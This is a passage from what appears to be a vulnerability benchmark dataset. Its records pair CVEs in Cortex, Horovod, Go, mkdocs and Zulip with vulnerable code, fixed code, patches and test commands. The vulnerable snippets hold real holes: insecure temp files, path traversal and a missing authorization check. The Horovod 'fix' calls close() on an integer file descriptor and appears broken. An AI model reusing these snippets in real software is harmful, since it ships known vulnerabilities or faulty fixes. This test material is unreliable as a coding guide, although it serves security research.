{\n+\t\t\treturn err\n+\t\t}\n+\t}\n+\n+\t// If the input config is a struct, recursively iterate on all fields.\n+\tif t.Kind() == reflect.Struct {\n+\t\tfor i := 0; i < t.NumField(); i++ {\n+\t\t\tfield := t.Field(i)\n+\t\t\tfieldValue := v.FieldByIndex(field.Index)\n+\n+\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n+\t\t\tif fieldValue.CanInterface() {\n+\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n+\t\t\t\t\treturn err\n+\t\t\t\t}\n+\t\t\t}\n+\t\t}\n+\t}\n+\n+\tif t.Kind() == reflect.Slice || t.Kind() == reflect.Array {\n+\t\tfor i := 0; i < v.Len(); i++ {\n+\t\t\tfieldValue := v.Index(i)\n+\n+\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n+\t\t\tif fieldValue.CanInterface() {\n+\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n+\t\t\t\t\treturn err\n+\t\t\t\t}\n+\t\t\t}\n+\t\t}\n+\t}\n+\n+\tif t.Kind() == reflect.Map {\n+\t\tfor _, key := range v.MapKeys() {\n+\t\t\tfieldValue := v.MapIndex(key)\n+\n+\t\t\t// Skip any field value which can't be converted to interface (eg. primitive types).\n+\t\t\tif fieldValue.CanInterface() {\n+\t\t\t\tif err := validateAlertmanagerConfig(fieldValue.Interface()); err != nil {\n+\t\t\t\t\treturn err\n+\t\t\t\t}\n+\t\t\t}\n+\t\t}\n+\t}\n+\n \treturn nil\n }\n\n--- /dev/null\n+++ b/pkg/alertmanager/api.go\n@@ -0,0 +1,9 @@\n+func validateGlobalConfig(cfg config.GlobalConfig) error {\n+\tif cfg.OpsGenieAPIKeyFile != \"\" {\n+\t\treturn errOpsGenieAPIKeyFileNotAllowed\n+\t}\n+\tif cfg.SlackAPIURLFile != \"\" {\n+\t\treturn errSlackAPIURLFileNotAllowed\n+\t}\n+\treturn nil\n+}\n\n--- /dev/null\n+++ b/pkg/alertmanager/api.go\n@@ -0,0 +1,6 @@\n+func validateOpsGenieConfig(cfg config.OpsGenieConfig) error {\n+\tif cfg.APIKeyFile != \"\" {\n+\t\treturn errOpsGenieAPIKeyFileNotAllowed\n+\t}\n+\treturn nil\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-23536:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/cortex\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestAMConfigValidationAPI$ github.com/cortexproject/cortex/pkg/alertmanager\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-23536:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/cortex\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(TestMultitenantAlertmanager_DeleteUserConfig|TestAMConfigListUserConfig|TestAMConfigValidationAPI|TestValidateAlertmanagerConfig)$' github.com/cortexproject/cortex/pkg/alertmanager\n"} {"cve_id": "CVE-2022-0315", "cve_description": "Insecure Temporary File in GitHub repository horovod/horovod prior to 0.24.0.", "cwe_info": {"CWE-668": {"name": "Exposure of Resource to Wrong Sphere", "description": "The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource."}}, "repo": "https://github.com/horovod/horovod", "patch_url": ["https://github.com/horovod/horovod/commit/b96ecae4dc69fc0a83c7c2d3f1dde600c20a1b41"], "programing_language": "Python", "vul_func": [{"id": "vul_py_359_1", "commit": "655353fc345b6a2512839a5bfc7086a5c7c614cf", "file_path": "horovod/runner/js_run.py", "start_line": 96, "end_line": 146, "snippet": "def generate_jsrun_rankfile(settings, path=None):\n \"\"\"\n Generates rankfile to use with jsrun.\n It splits the cores among the processes, which leads to 
best performance according to experiments.\n\n Args:\n settings: Settings for running jsrun.\n Note: settings.num_proc and settings.hosts must not be None.\n path: Optional path of the rankfile.\n Note: this file will be overwritten.\n \"\"\"\n cpu_per_gpu = (lsf.LSFUtils.get_num_cores() * lsf.LSFUtils.get_num_threads()) // lsf.LSFUtils.get_num_gpus()\n host_list = (x.split(':') for x in settings.hosts.split(','))\n\n # Verify and truncate host list if necessary\n validated_list = []\n remaining_slots = settings.num_proc\n for host, slots in host_list:\n slots = int(slots)\n if slots > lsf.LSFUtils.get_num_gpus():\n raise ValueError('Invalid host input, slot count for host \\'{host}:{slots}\\' is greater '\n 'than number of GPUs per host \\'{gpus}\\'.'.format(\n host=host, slots=slots, gpus=lsf.LSFUtils.get_num_gpus()))\n needed_slots = min(slots, remaining_slots)\n validated_list.append((host, needed_slots))\n remaining_slots -= needed_slots\n if remaining_slots == 0:\n break\n if remaining_slots != 0:\n raise ValueError('Not enough slots on the hosts to fulfill the {slots} requested.'.format(\n slots=settings.num_proc))\n\n # Generate rankfile\n path = tempfile.mktemp() if path is None else path\n with open(path, 'w') as tmp:\n tmp.write('overlapping_rs: allow\\n')\n tmp.write('cpu_index_using: logical\\n')\n rank = 0\n for host, slots in validated_list:\n cpu_val = 0\n tmp.write('\\n')\n for s in range(slots):\n tmp.write('rank: {rank}: {{ hostname: {host}; cpu: {{{scpu}-{ecpu}}} ; gpu: * ; mem: * }}\\n'.format(\n rank=rank,\n host=host,\n scpu=cpu_val,\n ecpu=cpu_val + cpu_per_gpu - 1\n ))\n rank += 1\n cpu_val += cpu_per_gpu\n return path"}], "fix_func": [{"id": "fix_py_359_1", "commit": "b96ecae4dc69fc0a83c7c2d3f1dde600c20a1b41", "file_path": "horovod/runner/js_run.py", "start_line": 96, "end_line": 151, "snippet": "def generate_jsrun_rankfile(settings, path=None):\n \"\"\"\n Generates rankfile to use with jsrun.\n It splits the cores among the processes, which leads to best performance according to experiments.\n\n Args:\n settings: Settings for running jsrun.\n Note: settings.num_proc and settings.hosts must not be None.\n path: Optional path of the rankfile.\n Note: this file will be overwritten.\n \"\"\"\n cpu_per_gpu = (lsf.LSFUtils.get_num_cores() * lsf.LSFUtils.get_num_threads()) // lsf.LSFUtils.get_num_gpus()\n host_list = (x.split(':') for x in settings.hosts.split(','))\n\n # Verify and truncate host list if necessary\n validated_list = []\n remaining_slots = settings.num_proc\n for host, slots in host_list:\n slots = int(slots)\n if slots > lsf.LSFUtils.get_num_gpus():\n raise ValueError('Invalid host input, slot count for host \\'{host}:{slots}\\' is greater '\n 'than number of GPUs per host \\'{gpus}\\'.'.format(\n host=host, slots=slots, gpus=lsf.LSFUtils.get_num_gpus()))\n needed_slots = min(slots, remaining_slots)\n validated_list.append((host, needed_slots))\n remaining_slots -= needed_slots\n if remaining_slots == 0:\n break\n if remaining_slots != 0:\n raise ValueError('Not enough slots on the hosts to fulfill the {slots} requested.'.format(\n slots=settings.num_proc))\n\n # Generate rankfile\n # using mkstemp here instead of insecure mktemp.\n # note that the caller is responsible for cleaning up this file\n if path is None:\n fd, path = tempfile.mkstemp()\n fd.close()\n\n with open(path, 'w') as tmp:\n tmp.write('overlapping_rs: allow\\n')\n tmp.write('cpu_index_using: logical\\n')\n rank = 0\n for host, slots in validated_list:\n cpu_val = 0\n tmp.write('\\n')\n 
for s in range(slots):\n tmp.write('rank: {rank}: {{ hostname: {host}; cpu: {{{scpu}-{ecpu}}} ; gpu: * ; mem: * }}\\n'.format(\n rank=rank,\n host=host,\n scpu=cpu_val,\n ecpu=cpu_val + cpu_per_gpu - 1\n ))\n rank += 1\n cpu_val += cpu_per_gpu\n return path"}], "vul_patch": "--- a/horovod/runner/js_run.py\n+++ b/horovod/runner/js_run.py\n@@ -31,7 +31,12 @@\n slots=settings.num_proc))\n \n # Generate rankfile\n- path = tempfile.mktemp() if path is None else path\n+ # using mkstemp here instead of insecure mktemp.\n+ # note that the caller is responsible for cleaning up this file\n+ if path is None:\n+ fd, path = tempfile.mkstemp()\n+ fd.close()\n+\n with open(path, 'w') as tmp:\n tmp.write('overlapping_rs: allow\\n')\n tmp.write('cpu_index_using: logical\\n')\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-29804", "cve_description": "Incorrect conversion of certain invalid paths to valid, absolute paths in Clean in path/filepath before Go 1.17.11 and Go 1.18.3 on Windows allows potential directory traversal attack.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/golang/go", "patch_url": ["https://github.com/golang/go/commit/5a89bb334d1280b0219108a8ee63c14dd04aa8fd"], "programing_language": "Go", "vul_func": [{"id": "vul_go_255_1", "commit": "da608a20ed87b7c6c860eaaf4f2dec39492f9da4", "file_path": "src/path/filepath/path.go", "start_line": 89, "end_line": 161, "snippet": "func Clean(path string) string {\n\toriginalPath := path\n\tvolLen := volumeNameLen(path)\n\tpath = path[volLen:]\n\tif path == \"\" {\n\t\tif volLen > 1 && originalPath[1] != ':' {\n\t\t\t// should be UNC\n\t\t\treturn FromSlash(originalPath)\n\t\t}\n\t\treturn originalPath + \".\"\n\t}\n\trooted := os.IsPathSeparator(path[0])\n\n\t// Invariants:\n\t//\treading from path; r is index of next byte to process.\n\t//\twriting to buf; w is index of next byte to write.\n\t//\tdotdot is index in buf where .. must stop, either because\n\t//\t\tit is the leading slash or it is a leading ../../.. prefix.\n\tn := len(path)\n\tout := lazybuf{path: path, volAndPath: originalPath, volLen: volLen}\n\tr, dotdot := 0, 0\n\tif rooted {\n\t\tout.append(Separator)\n\t\tr, dotdot = 1, 1\n\t}\n\n\tfor r < n {\n\t\tswitch {\n\t\tcase os.IsPathSeparator(path[r]):\n\t\t\t// empty path element\n\t\t\tr++\n\t\tcase path[r] == '.' && (r+1 == n || os.IsPathSeparator(path[r+1])):\n\t\t\t// . element\n\t\t\tr++\n\t\tcase path[r] == '.' && path[r+1] == '.' && (r+2 == n || os.IsPathSeparator(path[r+2])):\n\t\t\t// .. element: remove to last separator\n\t\t\tr += 2\n\t\t\tswitch {\n\t\t\tcase out.w > dotdot:\n\t\t\t\t// can backtrack\n\t\t\t\tout.w--\n\t\t\t\tfor out.w > dotdot && !os.IsPathSeparator(out.index(out.w)) {\n\t\t\t\t\tout.w--\n\t\t\t\t}\n\t\t\tcase !rooted:\n\t\t\t\t// cannot backtrack, but not rooted, so append .. 
element.\n\t\t\t\tif out.w > 0 {\n\t\t\t\t\tout.append(Separator)\n\t\t\t\t}\n\t\t\t\tout.append('.')\n\t\t\t\tout.append('.')\n\t\t\t\tdotdot = out.w\n\t\t\t}\n\t\tdefault:\n\t\t\t// real path element.\n\t\t\t// add slash if needed\n\t\t\tif rooted && out.w != 1 || !rooted && out.w != 0 {\n\t\t\t\tout.append(Separator)\n\t\t\t}\n\t\t\t// copy element\n\t\t\tfor ; r < n && !os.IsPathSeparator(path[r]); r++ {\n\t\t\t\tout.append(path[r])\n\t\t\t}\n\t\t}\n\t}\n\n\t// Turn empty string into \".\"\n\tif out.w == 0 {\n\t\tout.append('.')\n\t}\n\n\treturn FromSlash(out.string())\n}"}], "fix_func": [{"id": "fix_go_255_1", "commit": "5a89bb334d1280b0219108a8ee63c14dd04aa8fd", "file_path": "src/path/filepath/path.go", "start_line": 89, "end_line": 173, "snippet": "func Clean(path string) string {\n\toriginalPath := path\n\tvolLen := volumeNameLen(path)\n\tpath = path[volLen:]\n\tif path == \"\" {\n\t\tif volLen > 1 && originalPath[1] != ':' {\n\t\t\t// should be UNC\n\t\t\treturn FromSlash(originalPath)\n\t\t}\n\t\treturn originalPath + \".\"\n\t}\n\trooted := os.IsPathSeparator(path[0])\n\n\t// Invariants:\n\t//\treading from path; r is index of next byte to process.\n\t//\twriting to buf; w is index of next byte to write.\n\t//\tdotdot is index in buf where .. must stop, either because\n\t//\t\tit is the leading slash or it is a leading ../../.. prefix.\n\tn := len(path)\n\tout := lazybuf{path: path, volAndPath: originalPath, volLen: volLen}\n\tr, dotdot := 0, 0\n\tif rooted {\n\t\tout.append(Separator)\n\t\tr, dotdot = 1, 1\n\t}\n\n\tfor r < n {\n\t\tswitch {\n\t\tcase os.IsPathSeparator(path[r]):\n\t\t\t// empty path element\n\t\t\tr++\n\t\tcase path[r] == '.' && r+1 == n:\n\t\t\t// . element\n\t\t\tr++\n\t\tcase path[r] == '.' && os.IsPathSeparator(path[r+1]):\n\t\t\t// ./ element\n\t\t\tr++\n\n\t\t\tfor r < len(path) && os.IsPathSeparator(path[r]) {\n\t\t\t\tr++\n\t\t\t}\n\t\t\tif out.w == 0 && volumeNameLen(path[r:]) > 0 {\n\t\t\t\t// When joining prefix \".\" and an absolute path on Windows,\n\t\t\t\t// the prefix should not be removed.\n\t\t\t\tout.append('.')\n\t\t\t}\n\t\tcase path[r] == '.' && path[r+1] == '.' && (r+2 == n || os.IsPathSeparator(path[r+2])):\n\t\t\t// .. element: remove to last separator\n\t\t\tr += 2\n\t\t\tswitch {\n\t\t\tcase out.w > dotdot:\n\t\t\t\t// can backtrack\n\t\t\t\tout.w--\n\t\t\t\tfor out.w > dotdot && !os.IsPathSeparator(out.index(out.w)) {\n\t\t\t\t\tout.w--\n\t\t\t\t}\n\t\t\tcase !rooted:\n\t\t\t\t// cannot backtrack, but not rooted, so append .. element.\n\t\t\t\tif out.w > 0 {\n\t\t\t\t\tout.append(Separator)\n\t\t\t\t}\n\t\t\t\tout.append('.')\n\t\t\t\tout.append('.')\n\t\t\t\tdotdot = out.w\n\t\t\t}\n\t\tdefault:\n\t\t\t// real path element.\n\t\t\t// add slash if needed\n\t\t\tif rooted && out.w != 1 || !rooted && out.w != 0 {\n\t\t\t\tout.append(Separator)\n\t\t\t}\n\t\t\t// copy element\n\t\t\tfor ; r < n && !os.IsPathSeparator(path[r]); r++ {\n\t\t\t\tout.append(path[r])\n\t\t\t}\n\t\t}\n\t}\n\n\t// Turn empty string into \".\"\n\tif out.w == 0 {\n\t\tout.append('.')\n\t}\n\n\treturn FromSlash(out.string())\n}"}], "vul_patch": "--- a/src/path/filepath/path.go\n+++ b/src/path/filepath/path.go\n@@ -29,9 +29,21 @@\n \t\tcase os.IsPathSeparator(path[r]):\n \t\t\t// empty path element\n \t\t\tr++\n-\t\tcase path[r] == '.' && (r+1 == n || os.IsPathSeparator(path[r+1])):\n+\t\tcase path[r] == '.' && r+1 == n:\n \t\t\t// . element\n \t\t\tr++\n+\t\tcase path[r] == '.' 
&& os.IsPathSeparator(path[r+1]):\n+\t\t\t// ./ element\n+\t\t\tr++\n+\n+\t\t\tfor r < len(path) && os.IsPathSeparator(path[r]) {\n+\t\t\t\tr++\n+\t\t\t}\n+\t\t\tif out.w == 0 && volumeNameLen(path[r:]) > 0 {\n+\t\t\t\t// When joining prefix \".\" and an absolute path on Windows,\n+\t\t\t\t// the prefix should not be removed.\n+\t\t\t\tout.append('.')\n+\t\t\t}\n \t\tcase path[r] == '.' && path[r+1] == '.' && (r+2 == n || os.IsPathSeparator(path[r+2])):\n \t\t\t// .. element: remove to last separator\n \t\t\tr += 2\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-40978", "cve_description": "The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/mkdocs/mkdocs", "patch_url": ["https://github.com/mkdocs/mkdocs/commit/1b15412f4caae476c262210315fd068d0521a833", "https://github.com/mkdocs/mkdocs/commit/57540911a0d632674dd23edec765189f96f84f6b"], "programing_language": "Python", "vul_func": [{"id": "vul_py_137_1", "commit": "e0ba6d7", "file_path": "mkdocs/livereload/__init__.py", "start_line": 162, "end_line": 219, "snippet": " def _serve_request(self, environ, start_response):\n # https://bugs.python.org/issue16679\n # https://github.com/bottlepy/bottle/blob/f9b1849db4/bottle.py#L984\n path = environ[\"PATH_INFO\"].encode(\"latin-1\").decode(\"utf-8\", \"ignore\")\n\n m = re.fullmatch(r\"/livereload/([0-9]+)/[0-9]+\", path)\n if m:\n epoch = int(m[1])\n start_response(\"200 OK\", [(\"Content-Type\", \"text/plain\")])\n\n def condition():\n return self._visible_epoch > epoch\n\n with self._epoch_cond:\n if not condition():\n # Stall the browser, respond as soon as there's something new.\n # If there's not, respond anyway after a minute.\n self._log_poll_request(environ.get(\"HTTP_REFERER\"), request_id=path)\n self._epoch_cond.wait_for(condition, timeout=self.poll_response_timeout)\n return [b\"%d\" % self._visible_epoch]\n\n if path == \"/js/livereload.js\":\n file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"livereload.js\")\n elif path.startswith(self.mount_path):\n if path.endswith(\"/\"):\n path += \"index.html\"\n path = path[len(self.mount_path):]\n file_path = os.path.join(self.root, path.lstrip(\"/\"))\n elif path == \"/\":\n start_response(\"302 Found\", [(\"Location\", self.mount_path)])\n return []\n else:\n return None # Not found\n\n # Wait until the ongoing rebuild (if any) finishes, so we're not serving a half-built site.\n with self._epoch_cond:\n self._epoch_cond.wait_for(lambda: self._visible_epoch == self._wanted_epoch)\n epoch = self._visible_epoch\n\n try:\n file = open(file_path, \"rb\")\n except OSError:\n 
return None # Not found\n\n if path.endswith(\".html\"):\n with file:\n content = file.read()\n content = self._inject_js_into_html(content, epoch)\n file = io.BytesIO(content)\n content_length = len(content)\n else:\n content_length = os.path.getsize(file_path)\n\n content_type = self._guess_type(file_path)\n start_response(\n \"200 OK\", [(\"Content-Type\", content_type), (\"Content-Length\", str(content_length))]\n )\n return wsgiref.util.FileWrapper(file)"}], "fix_func": [{"id": "fix_py_137_1", "commit": "1b15412", "file_path": "mkdocs/livereload/__init__.py", "start_line": 162, "end_line": 222, "snippet": " def _serve_request(self, environ, start_response):\n # https://bugs.python.org/issue16679\n # https://github.com/bottlepy/bottle/blob/f9b1849db4/bottle.py#L984\n path = environ[\"PATH_INFO\"].encode(\"latin-1\").decode(\"utf-8\", \"ignore\")\n\n m = re.fullmatch(r\"/livereload/([0-9]+)/[0-9]+\", path)\n if m:\n epoch = int(m[1])\n start_response(\"200 OK\", [(\"Content-Type\", \"text/plain\")])\n\n def condition():\n return self._visible_epoch > epoch\n\n with self._epoch_cond:\n if not condition():\n # Stall the browser, respond as soon as there's something new.\n # If there's not, respond anyway after a minute.\n self._log_poll_request(environ.get(\"HTTP_REFERER\"), request_id=path)\n self._epoch_cond.wait_for(condition, timeout=self.poll_response_timeout)\n return [b\"%d\" % self._visible_epoch]\n\n if path == \"/js/livereload.js\":\n file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"livereload.js\")\n elif path.startswith(self.mount_path):\n rel_file_path = path[len(self.mount_path):].lstrip(\"/\")\n if path.endswith(\"/\"):\n rel_file_path += \"index.html\"\n file_path = os.path.join(self.root, rel_file_path)\n elif path == \"/\":\n start_response(\"302 Found\", [(\"Location\", self.mount_path)])\n return []\n else:\n return None # Not found\n\n # Wait until the ongoing rebuild (if any) finishes, so we're not serving a half-built site.\n with self._epoch_cond:\n self._epoch_cond.wait_for(lambda: self._visible_epoch == self._wanted_epoch)\n epoch = self._visible_epoch\n\n try:\n file = open(file_path, \"rb\")\n except OSError:\n if not path.endswith(\"/\") and os.path.isfile(os.path.join(file_path, \"index.html\")):\n start_response(\"302 Found\", [(\"Location\", path + \"/\")])\n return []\n return None # Not found\n\n if file_path.endswith(\".html\"):\n with file:\n content = file.read()\n content = self._inject_js_into_html(content, epoch)\n file = io.BytesIO(content)\n content_length = len(content)\n else:\n content_length = os.path.getsize(file_path)\n\n content_type = self._guess_type(file_path)\n start_response(\n \"200 OK\", [(\"Content-Type\", content_type), (\"Content-Length\", str(content_length))]\n )\n return wsgiref.util.FileWrapper(file)"}], "vul_patch": "--- a/mkdocs/livereload/__init__.py\n+++ b/mkdocs/livereload/__init__.py\n@@ -22,10 +22,10 @@\n if path == \"/js/livereload.js\":\n file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"livereload.js\")\n elif path.startswith(self.mount_path):\n+ rel_file_path = path[len(self.mount_path):].lstrip(\"/\")\n if path.endswith(\"/\"):\n- path += \"index.html\"\n- path = path[len(self.mount_path):]\n- file_path = os.path.join(self.root, path.lstrip(\"/\"))\n+ rel_file_path += \"index.html\"\n+ file_path = os.path.join(self.root, rel_file_path)\n elif path == \"/\":\n start_response(\"302 Found\", [(\"Location\", self.mount_path)])\n return []\n@@ -40,9 +40,12 @@\n try:\n file = 
open(file_path, \"rb\")\n except OSError:\n+ if not path.endswith(\"/\") and os.path.isfile(os.path.join(file_path, \"index.html\")):\n+ start_response(\"302 Found\", [(\"Location\", path + \"/\")])\n+ return []\n return None # Not found\n \n- if path.endswith(\".html\"):\n+ if file_path.endswith(\".html\"):\n with file:\n content = file.read()\n content = self._inject_js_into_html(content, epoch)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-31168", "cve_description": "Zulip is an open source team chat tool. Due to an incorrect authorization check in Zulip Server 5.4 and earlier, a member of an organization could craft an API call that grants organization administrator privileges to one of their bots. The vulnerability is fixed in Zulip Server 5.5. Members who don\u2019t own any bots, and lack permission to create them, can\u2019t exploit the vulnerability. As a workaround for the vulnerability, an organization administrator can restrict the `Who can create bots` permission to administrators only, and change the ownership of existing bots.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-863": {"name": "Incorrect Authorization", "description": "The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check."}}, "repo": "https://github.com/zulip/zulip", "patch_url": ["https://github.com/zulip/zulip/commit/751b2a03e565e9eb02ffe923b7c24ac73d604034"], "programing_language": "Python", "vul_func": [{"id": "vul_py_409_1", "commit": "ad2ca0e6685f9aa46a1df1495fc08e73b98e1091", "file_path": "zerver/views/users.py", "start_line": 172, "end_line": 231, "snippet": "def update_user_backend(\n request: HttpRequest,\n user_profile: UserProfile,\n user_id: int,\n full_name: Optional[str] = REQ(default=None),\n role: Optional[int] = REQ(\n default=None,\n json_validator=check_int_in(\n UserProfile.ROLE_TYPES,\n ),\n ),\n profile_data: Optional[List[Dict[str, Optional[Union[int, ProfileDataElementValue]]]]] = REQ(\n default=None,\n json_validator=check_profile_data,\n ),\n) -> HttpResponse:\n target = access_user_by_id(\n user_profile, user_id, allow_deactivated=True, allow_bots=True, for_admin=True\n )\n\n if role is not None and target.role != role:\n # Require that the current user has permissions to\n # grant/remove the role in question. 
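The mkdocs record above maps a request path to a filesystem path with `os.path.join(self.root, path.lstrip("/"))`, and nothing strips `..` segments before the join. A minimal, standalone sketch of that CWE-22 pattern plus one common containment check follows; `resolve_under_root` and the `PermissionError` behavior are illustrative assumptions, not mkdocs code.

```python
import os

def resolve_under_root(root: str, request_path: str) -> str:
    """Map a URL path to a file under `root`, rejecting escapes.

    os.path.join() keeps "../" segments, so "/docs/../../etc/passwd"
    can resolve outside `root` unless containment is verified afterwards.
    """
    candidate = os.path.normpath(os.path.join(root, request_path.lstrip("/")))
    root_abs = os.path.abspath(root)
    if os.path.commonpath([root_abs, os.path.abspath(candidate)]) != root_abs:
        raise PermissionError(f"path escapes serving root: {request_path!r}")
    return candidate
```

Note that the upstream patch itself (the vendor disputed the CVE, per the description above) mostly refactors the join and adds a directory redirect; the containment check here is a generic hardening sketch, not the mkdocs change.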
access_user_by_id has\n # already verified we're an administrator; here we enforce\n # that only owners can toggle the is_realm_owner flag.\n #\n # Logic replicated in patch_bot_backend.\n if UserProfile.ROLE_REALM_OWNER in [role, target.role] and not user_profile.is_realm_owner:\n raise OrganizationOwnerRequired()\n\n if target.role == UserProfile.ROLE_REALM_OWNER and check_last_owner(target):\n raise JsonableError(\n _(\"The owner permission cannot be removed from the only organization owner.\")\n )\n do_change_user_role(target, role, acting_user=user_profile)\n\n if full_name is not None and target.full_name != full_name and full_name.strip() != \"\":\n # We don't respect `name_changes_disabled` here because the request\n # is on behalf of the administrator.\n check_change_full_name(target, full_name, user_profile)\n\n if profile_data is not None:\n clean_profile_data: List[ProfileDataElementUpdateDict] = []\n for entry in profile_data:\n assert isinstance(entry[\"id\"], int)\n assert not isinstance(entry[\"value\"], int)\n if entry[\"value\"] is None or not entry[\"value\"]:\n field_id = entry[\"id\"]\n check_remove_custom_profile_field_value(target, field_id)\n else:\n clean_profile_data.append(\n {\n \"id\": entry[\"id\"],\n \"value\": entry[\"value\"],\n }\n )\n validate_user_custom_profile_data(target.realm.id, clean_profile_data)\n do_update_user_custom_profile_data_if_changed(target, clean_profile_data)\n\n return json_success(request)"}, {"id": "vul_py_409_2", "commit": "ad2ca0e6685f9aa46a1df1495fc08e73b98e1091", "file_path": "zerver/views/users.py", "start_line": 304, "end_line": 404, "snippet": "def patch_bot_backend(\n request: HttpRequest,\n user_profile: UserProfile,\n bot_id: int,\n full_name: Optional[str] = REQ(default=None),\n role: Optional[int] = REQ(\n default=None,\n json_validator=check_int_in(\n UserProfile.ROLE_TYPES,\n ),\n ),\n bot_owner_id: Optional[int] = REQ(json_validator=check_int, default=None),\n config_data: Optional[Dict[str, str]] = REQ(\n default=None, json_validator=check_dict(value_validator=check_string)\n ),\n service_payload_url: Optional[str] = REQ(json_validator=check_url, default=None),\n service_interface: int = REQ(json_validator=check_int, default=1),\n default_sending_stream: Optional[str] = REQ(default=None),\n default_events_register_stream: Optional[str] = REQ(default=None),\n default_all_public_streams: Optional[bool] = REQ(default=None, json_validator=check_bool),\n) -> HttpResponse:\n bot = access_bot_by_id(user_profile, bot_id)\n\n if full_name is not None:\n check_change_bot_full_name(bot, full_name, user_profile)\n\n if role is not None and bot.role != role:\n # Logic duplicated from update_user_backend.\n if UserProfile.ROLE_REALM_OWNER in [role, bot.role] and not user_profile.is_realm_owner:\n raise OrganizationOwnerRequired()\n\n do_change_user_role(bot, role, acting_user=user_profile)\n\n if bot_owner_id is not None:\n try:\n owner = get_user_profile_by_id_in_realm(bot_owner_id, user_profile.realm)\n except UserProfile.DoesNotExist:\n raise JsonableError(_(\"Failed to change owner, no such user\"))\n if not owner.is_active:\n raise JsonableError(_(\"Failed to change owner, user is deactivated\"))\n if owner.is_bot:\n raise JsonableError(_(\"Failed to change owner, bots can't own other bots\"))\n\n previous_owner = bot.bot_owner\n if previous_owner != owner:\n do_change_bot_owner(bot, owner, user_profile)\n\n if default_sending_stream is not None:\n if default_sending_stream == \"\":\n stream: Optional[Stream] = None\n else:\n 
(stream, sub) = access_stream_by_name(user_profile, default_sending_stream)\n do_change_default_sending_stream(bot, stream, acting_user=user_profile)\n if default_events_register_stream is not None:\n if default_events_register_stream == \"\":\n stream = None\n else:\n (stream, sub) = access_stream_by_name(user_profile, default_events_register_stream)\n do_change_default_events_register_stream(bot, stream, acting_user=user_profile)\n if default_all_public_streams is not None:\n do_change_default_all_public_streams(\n bot, default_all_public_streams, acting_user=user_profile\n )\n\n if service_payload_url is not None:\n check_valid_interface_type(service_interface)\n assert service_interface is not None\n do_update_outgoing_webhook_service(bot, service_interface, service_payload_url)\n\n if config_data is not None:\n do_update_bot_config_data(bot, config_data)\n\n if len(request.FILES) == 0:\n pass\n elif len(request.FILES) == 1:\n user_file = list(request.FILES.values())[0]\n assert isinstance(user_file, UploadedFile)\n assert user_file.size is not None\n upload_avatar_image(user_file, user_profile, bot)\n avatar_source = UserProfile.AVATAR_FROM_USER\n do_change_avatar_fields(bot, avatar_source, acting_user=user_profile)\n else:\n raise JsonableError(_(\"You may only upload one file at a time\"))\n\n json_result = dict(\n full_name=bot.full_name,\n avatar_url=avatar_url(bot),\n service_interface=service_interface,\n service_payload_url=service_payload_url,\n config_data=config_data,\n default_sending_stream=get_stream_name(bot.default_sending_stream),\n default_events_register_stream=get_stream_name(bot.default_events_register_stream),\n default_all_public_streams=bot.default_all_public_streams,\n )\n\n # Don't include the bot owner in case it is not set.\n # Default bots have no owner.\n if bot.bot_owner is not None:\n json_result[\"bot_owner\"] = bot.bot_owner.email\n\n return json_success(request, data=json_result)"}], "fix_func": [{"id": "fix_py_409_1", "commit": "751b2a03e565e9eb02ffe923b7c24ac73d604034", "file_path": "zerver/views/users.py", "start_line": 173, "end_line": 232, "snippet": "def update_user_backend(\n request: HttpRequest,\n user_profile: UserProfile,\n user_id: int,\n full_name: Optional[str] = REQ(default=None),\n role: Optional[int] = REQ(\n default=None,\n json_validator=check_int_in(\n UserProfile.ROLE_TYPES,\n ),\n ),\n profile_data: Optional[List[Dict[str, Optional[Union[int, ProfileDataElementValue]]]]] = REQ(\n default=None,\n json_validator=check_profile_data,\n ),\n) -> HttpResponse:\n target = access_user_by_id(\n user_profile, user_id, allow_deactivated=True, allow_bots=True, for_admin=True\n )\n\n if role is not None and target.role != role:\n # Require that the current user has permissions to\n # grant/remove the role in question.\n #\n # Logic replicated in patch_bot_backend.\n if UserProfile.ROLE_REALM_OWNER in [role, target.role] and not user_profile.is_realm_owner:\n raise OrganizationOwnerRequired()\n elif not user_profile.is_realm_admin:\n raise OrganizationAdministratorRequired()\n\n if target.role == UserProfile.ROLE_REALM_OWNER and check_last_owner(target):\n raise JsonableError(\n _(\"The owner permission cannot be removed from the only organization owner.\")\n 